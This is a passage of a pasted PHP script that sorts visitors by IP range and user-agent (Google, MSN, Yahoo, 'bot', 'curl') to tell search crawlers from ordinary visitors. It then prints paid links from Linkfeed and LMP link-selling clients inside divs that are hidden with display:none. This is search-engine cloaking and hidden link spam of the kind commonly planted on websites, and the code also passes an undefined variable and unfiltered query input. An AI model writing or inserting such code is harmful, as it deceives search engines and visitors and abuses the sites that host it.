 778.                 "64\.233\.1[6-9][0-9]\.[0-9]+", // Google   NetRange:   64.233.160.0 - 64.233.191.255
 779.                 "66\.192\.[0-9]+\.[0-9]+",
 780.                 "64\.128\.[0-9]+\.[0-9]+",
 781.                 "209\.185\.253\.1[6-8][1-9]",
 782.                 "209\.185\.108\.1[6-8][1-9]",
 783.                 "64\.68\.8[0-2]\.[0-9]+",
 784.                 "66\.249\.[6-7][1-9]\.[0-9]+",
 785.                
 786.                 "65\.5[2-5]\.[0-9]+\.[0-9]+",   // MSN      NetRange:   65.52.0.0 - 65.55.255.255,
 787.                 "74\.6\.[0-9]+\.[0-9]+",        // Yahoo    NetRange:   74.6.0.0 - 74.6.255.255
 788.                 "67\.195\.[0-9]+\.[0-9]+",      // Yahoo#2  NetRange:   67.195.0.0  - 67.195.255.255
 789.                 "72\.30\.[0-9]+\.[0-9]+",       // Yahoo#3  NetRange:   72.30.0.0 - 72.30.255.255
 790.                 "38\.[0-9]+\.[0-9]+\.[0-9]+",   // Cuill:   NetRange:   38.0.0.0 - 38.255.255.255
 791.                 "93\.172\.94\.227",             // MacFinder
 792.                 "212\.100\.250\.218",           // Wells Search II
 793.                 "71\.165\.223\.134",            // Indy Library
 794.                 "70\.91\.180\.25",
 795.                 "65\.93\.62\.242",
 796.                 "74\.193\.246\.129",
 797.                 "213\.144\.15\.38",
 798.                 "195\.92\.229\.2",
 799.                 "70\.50\.189\.191",
 800.                 "218\.28\.88\.99",
 801.                 "165\.160\.2\.20",
 802.                 "89\.122\.224\.230",
 803.                 "66\.230\.175\.124",
 804.                 "218\.18\.174\.27",
 805.                 "65\.33\.87\.94",
 806.                 "67\.210\.111\.241",
 807.                 "81\.135\.175\.70",
 808.                 "64\.69\.34\.134",
 809.                 "89\.149\.253\.169",
 810.                 "66\.36\.243\.182"
 811.             );
 812.             $is_bot = false;
 813.             $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot", "crawler", "spider", "robot", "HttpClient", "curl", "PHP", "Indy Library", "WordPress");
 814.             $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent\:[\s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);
 815.            
 816.             foreach ($stop_ips_masks as $stop_ip_mask) if(eregi("^{$stop_ip_mask}$", @$_SERVER['REMOTE_ADDR'])) $is_bot = true;
 817.             foreach ($stop_agents_masks as $stop_agents_mask) if(eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false) $is_bot = true;
 818.      
 819.      
 820.      if (gettype($rsp)=='integer' || gettype($qsp) == 'integer' || gettype($rrs)=='integer' || $_SERVER['REMOTE_ADDR']=='81.177.144.46' || $_SERVER['REMOTE_ADDR']=='217.107.36.73' || $_SERVER['REMOTE_ADDR']=='217.107.36.132' || $_SERVER['REMOTE_ADDR']=='87.242.74.101' || $_SERVER['REMOTE_ADDR']=='80.251.136.38' || gettype($ybot)=='integer' || gettype($gbot)=='integer' || $is_bot !== false)  
 821.     {
 822.     echo '<div id="nvorst">';
 823.         setcookie("SESSe7da53566c688d456347","3cca28a37dc22cfff5eab70704ee5301",time()+60*60*24*365);
 824.     }
 825.    
 826.     else
 827.     {
 828.     echo '<style> div#bdd1b7801d9329b2f9d7313381627c70c, div#bdd1b7801d9329b2f9d7313381627c70c a {  font-style: normal; font-family: Verdana, Tahoma, sans-serif; text-decoration: none; display:none; font-weight: normal;
 829. font-size: 8px;   color: gray; text-align: center;
 830.  } </style>';
 831.     echo '<div id="bdd1b7801d9329b2f9d7313381627c70c">';
 832.         }
 833.     }
 834.    
 835.        
 836.        
 837.        
 838.        //
 839.        
 840.        
 841.        define('LINKFEED_USER', '554db95d117935c21bf94edd0c5c791bc27543b6');
 842.        $q['charset'] = 'UTF-8';
 843.        //$q['request_uri'] = ((isset($_SERVER['REDIRECT_URL'])) ? $_SERVER['REDIRECT_URL'] : '');
 844.        $q['request_uri'] = $_GET['uri'];
 845.        //$q['request_uri'] = getenv('request_uri');
 846.        //$q['request_uri'] = $_SERVER['SCRIPT_URL'];
 847.        //$q['host'] = '';
 848.        //$q[ 'verbose' ] = true;
 849.        //$q[ "force_show_code" ] = true;
 850.        //$q['fetch_remote_type']='curl'; //[file_get_contents|curl|socket]
 851.         $linkfeed = new LinkfeedClient( $q );
 852.         echo $linkfeed->return_links();
 853.        
 854.      
 855.      
 856.        
 857.        echo '</div>';
 858.        
 859.        
 860.        
 861.        
 862.        ///end linkfeed
 863.  
 864.  
 865. echo '<style> div#bdd1b7801d9329b2f9d7313381627c70c, div#bdd1b7801d9329b2f9d7313381627c70c a {  font-style: normal; font-family: Verdana, Tahoma, sans-serif; text-decoration: none; display:none; font-weight: normal; font-size: 8px;   color: gray; text-align: center;} </style>';
 866.     echo '<div id="bdd1b7801d9329b2f9d7313381627c70c">';   
 867.    
 868.    //$o['charset'] = 'UTF-8';
 869.         //$o['request_uri'] = ((isset($_SERVER['REDIRECT_URL'])) ? $_SERVER['REDIRECT_URL'] : '');
 870.         $q['request_uri'] = $_GET['uri'];
 871.         //$o[ "force_show_code" ] = true;
 872.         //$o['fetch_remote_type']='curl'; //[file_get_contents|curl|socket]
 873.         $lmp = new lmp_client( $o );
 874.         print $lmp->print_links();
 875.         unset($o);
 876.    
 877.    
 878.    echo '</div>';
 879.  
 880.  
 881.  
 882.  
 883. }
 884. ?>
Advertisement
RAW Paste Data Copied
Advertisement